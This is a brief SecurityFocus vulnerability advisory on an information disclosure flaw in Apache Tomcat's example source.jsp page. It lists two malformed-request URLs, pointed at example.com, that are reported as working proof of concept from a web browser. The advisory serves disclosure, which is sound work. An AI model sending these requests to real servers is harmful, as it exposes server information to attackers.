Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability

This vulnerability may be exploited with a web browser.

The following two examples have been reported as working proof of concept:

http://example.com:80/examples/jsp/source.jsp??
http://example.com:80/examples/jsp/source.jsp?/jsp/


 

Privacy Statement
Copyright 2010, SecurityFocus